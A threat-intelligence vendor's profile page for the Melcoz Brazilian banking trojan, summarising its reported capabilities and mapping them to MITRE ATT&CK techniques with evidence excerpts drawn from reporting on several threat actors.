Skip to main content
Meet us at Black Hat USA 2026— Las Vegas, August 1–6Book a Meeting
Mallory
Malware

Melcoz

Melcoz is a Brazilian banking trojan associated with the "Tetrade" cluster identified by Kaspersky, alongside Grandoreiro, Guildma, and Ousaban/Javali. The malware targets Windows systems and is focused on online banking fraud. Reported capabilities include monitoring clipboard contents, stealing credentials from web browsers, monitoring the victim's browser for online banking sessions, and displaying an overlay window to manipulate banking sessions in the background. Observed execution and delivery methods include malicious links embedded in emails, MSI files with embedded VBScript, VBS scripts used to execute malicious DLLs, and distribution via an AutoIt loader script. Melcoz samples have also been packed with VMProtect and Themida to hinder analysis and evade detection.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566.002Spearphishing LinkEvidence2

Multiple actors and malware families are described as sending spearphishing/phishing emails containing malicious links (including shortened URLs, cloud-hosted links, and links to archives or documents) to deliver malware, harvest credentials, or redirect victims to malicious content.

Execution

5 techniques
T1059Command and Scripting InterpreterEvidence1

APT37 has used Ruby scripts to execute payloads.

T1059.005Visual BasicEvidence2

The content repeatedly describes threat actors and malware using VBScript, VBS, VBA macros, and Visual Basic code for execution, payload delivery, persistence, reconnaissance, and command execution.

T1059.010AutoHotKey & AutoITEvidence2

APT39 has utilized AutoIt and custom scripts to perform internal reconnaissance. Melcoz has been distributed through an AutoIt loader script.

T1204.001Malicious LinkEvidence1
T1574.001DLLEvidence2

"AppleJeus ... has also used DLL search order hijacking via the IKEEXT service, running with LocalSystem privileges, to load the TAXHAUL DLL for persistence." / "APT41 ... has used search order hijacking to execute malicious payloads" / "Cinnamon Tempest has used search order hijacking to launch Cobalt Strike Beacons."

Stealth

3 techniques
T1027.002Software PackingEvidence2

"Sandworm Team used UPX to pack a copy of Mimikatz"; "APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium"; "Lazarus Group packed malicious .db files with Themida to evade detection."

T1218.007MsiexecEvidence2

“AppleJeus delivered components using a Windows Installer package (.msi)… executed the 3CXDesktopApp.exe…”, “APT38 has used msiexec.exe to execute malicious files.”, “Rancor has used msiexec to download and execute malicious installer files over HTTP.”, “TA505 has used msiexec to download and execute malicious Windows Installer files.”

T1574.001DLLEvidence2

"AppleJeus ... has also used DLL search order hijacking via the IKEEXT service, running with LocalSystem privileges, to load the TAXHAUL DLL for persistence." / "APT41 ... has used search order hijacking to execute malicious payloads" / "Cinnamon Tempest has used search order hijacking to launch Cobalt Strike Beacons."

Credential Access

1 technique
T1555.003Credentials from Web BrowsersEvidence5

The content repeatedly describes threat actors and malware stealing usernames, passwords, cookies, session tokens, and other saved credentials from web browsers such as Chrome, Firefox, Internet Explorer, Edge, Opera, Safari, and Yandex.

Collection

2 techniques
T1115Clipboard DataEvidence3

Agent Tesla can steal data from the victim’s clipboard. APT38 used a Trojan called KEYLIME to collect data from the clipboard. APT39 has used tools capable of stealing contents of the clipboard.

T1185Browser Session HijackingEvidence2

Cobalt Strike can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates. Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies. Grandoreiro can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields. IcedID has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials. Melcoz can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background. QakBot can use advanced web injects to steal web banking credentials. TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page. Ursnif has injected HTML codes into banking sites to steal sensitive online banking information.

Command and Control

1 technique
T1105Ingress Tool TransferEvidence1

Impact

1 technique
T1565.002Transmitted Data ManipulationEvidence1
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping13

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.